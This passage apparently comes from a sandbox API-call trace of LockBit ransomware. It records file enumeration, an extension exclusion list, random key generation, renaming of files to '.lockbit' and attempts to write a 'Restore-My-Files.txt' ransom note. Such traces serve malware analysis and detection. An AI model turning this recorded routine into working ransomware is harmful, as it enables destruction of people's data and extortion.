lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.464] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.469] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0281904.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0281904.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.469] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.469] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.474] free (_Block=0x1fa2ed8) [0197.474] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0281904.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.474] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.474] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.474] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1a4f200, ftCreationTime.dwHighDateTime=0x1bed3d9, ftLastAccessTime.dwLowDateTime=0xbd5d1680, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe1a4f200, ftLastWriteTime.dwHighDateTime=0x1bed3d9, nFileSizeHigh=0x0, nFileSizeLow=0x4dc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0283209.GIF", cAlternateFileName="")) returned 1 [0197.474] lstrcmpiW (lpString1=".", lpString2="J0283209.GIF") returned -1 [0197.474] lstrcmpiW (lpString1="..", lpString2="J0283209.GIF") returned -1 [0197.474] PathFindExtensionW (pszPath="J0283209.GIF") returned=".GIF" [0197.474] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0197.474] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0197.474] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0197.474] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0197.474] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0197.474] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0197.474] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0197.474] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0197.474] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0197.475] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0197.475] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0197.475] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0197.475] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0197.475] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0197.475] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0197.475] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0197.475] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0197.475] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0197.476] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0283209.GIF") returned 1 [0197.476] lstrcmpiW (lpString1="ntldr", lpString2="J0283209.GIF") returned 1 [0197.476] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0283209.GIF") returned 1 [0197.476] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0283209.GIF") returned -1 [0197.476] lstrcmpiW (lpString1="autorun.inf", lpString2="J0283209.GIF") returned -1 [0197.476] lstrcmpiW (lpString1="thumbs.db", lpString2="J0283209.GIF") returned 1 [0197.476] lstrcmpiW (lpString1="iconcache.db", lpString2="J0283209.GIF") returned -1 [0197.476] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.476] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0283209.GIF") returned=".GIF" [0197.476] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0197.476] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0197.476] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0197.476] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0197.476] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0197.476] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0197.477] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0197.477] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0197.477] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0197.477] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0197.477] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0197.477] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0197.477] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0197.477] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0197.477] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0197.477] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0197.477] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0197.477] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0197.477] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0197.477] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0197.477] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0197.477] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0197.477] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0197.477] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0197.477] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0197.477] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0197.477] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0197.477] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0283209.GIF.lockbit") returned 70 [0197.477] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0283209.GIF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0283209.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.480] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.480] malloc (_Size=0x40068) returned 0x3df0008 [0197.480] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=19910) returned 1 [0197.480] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.481] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.486] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0283209.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0283209.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.486] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.486] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.488] free (_Block=0x1fa2ed8) [0197.488] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0283209.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.488] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.488] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.488] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7ae3400, ftCreationTime.dwHighDateTime=0x1bea1cc, ftLastAccessTime.dwLowDateTime=0xbd5d1680, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb7ae3400, ftLastWriteTime.dwHighDateTime=0x1bea1cc, nFileSizeHigh=0x0, nFileSizeLow=0x62e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0284916.JPG", cAlternateFileName="")) returned 1 [0197.488] lstrcmpiW (lpString1=".", lpString2="J0284916.JPG") returned -1 [0197.488] lstrcmpiW (lpString1="..", lpString2="J0284916.JPG") returned -1 [0197.488] PathFindExtensionW (pszPath="J0284916.JPG") returned=".JPG" [0197.488] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0197.488] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0197.488] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0197.488] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0197.489] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0197.489] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0197.490] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0197.490] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0197.490] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0197.490] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0197.490] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0197.490] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0197.490] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0197.490] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0197.490] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0197.490] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0197.490] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0197.490] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0197.490] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0197.490] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0197.490] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0197.490] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0197.490] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0284916.JPG") returned 1 [0197.490] lstrcmpiW (lpString1="ntldr", lpString2="J0284916.JPG") returned 1 [0197.490] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0284916.JPG") returned 1 [0197.490] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0284916.JPG") returned -1 [0197.490] lstrcmpiW (lpString1="autorun.inf", lpString2="J0284916.JPG") returned -1 [0197.490] lstrcmpiW (lpString1="thumbs.db", lpString2="J0284916.JPG") returned 1 [0197.490] lstrcmpiW (lpString1="iconcache.db", lpString2="J0284916.JPG") returned -1 [0197.490] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.490] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0284916.JPG") returned=".JPG" [0197.490] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0197.490] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0197.491] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0197.491] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0197.491] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0284916.JPG.lockbit") returned 70 [0197.491] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0284916.JPG" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0284916.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.493] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.493] malloc (_Size=0x40068) returned 0x3df0008 [0197.493] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=25315) returned 1 [0197.493] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.494] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.494] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.494] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.494] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.498] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0284916.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0284916.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.498] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.498] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0197.500] free (_Block=0x1fa2ed8) [0197.500] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0284916.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.500] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.500] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.500] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa68bc300, ftCreationTime.dwHighDateTime=0x1befd79, ftLastAccessTime.dwLowDateTime=0xbd5d1680, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa68bc300, ftLastWriteTime.dwHighDateTime=0x1befd79, nFileSizeHigh=0x0, nFileSizeLow=0x7876, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285360.WMF", cAlternateFileName="")) returned 1 [0197.500] lstrcmpiW (lpString1=".", lpString2="J0285360.WMF") returned -1 [0197.500] lstrcmpiW (lpString1="..", lpString2="J0285360.WMF") returned -1 [0197.500] PathFindExtensionW (pszPath="J0285360.WMF") returned=".WMF" [0197.500] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.500] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.500] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.500] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.500] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.500] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.500] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.500] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.500] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.501] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.502] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.502] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285360.WMF") returned 1 [0197.502] lstrcmpiW (lpString1="ntldr", lpString2="J0285360.WMF") returned 1 [0197.502] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285360.WMF") returned 1 [0197.502] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285360.WMF") returned -1 [0197.502] lstrcmpiW (lpString1="autorun.inf", 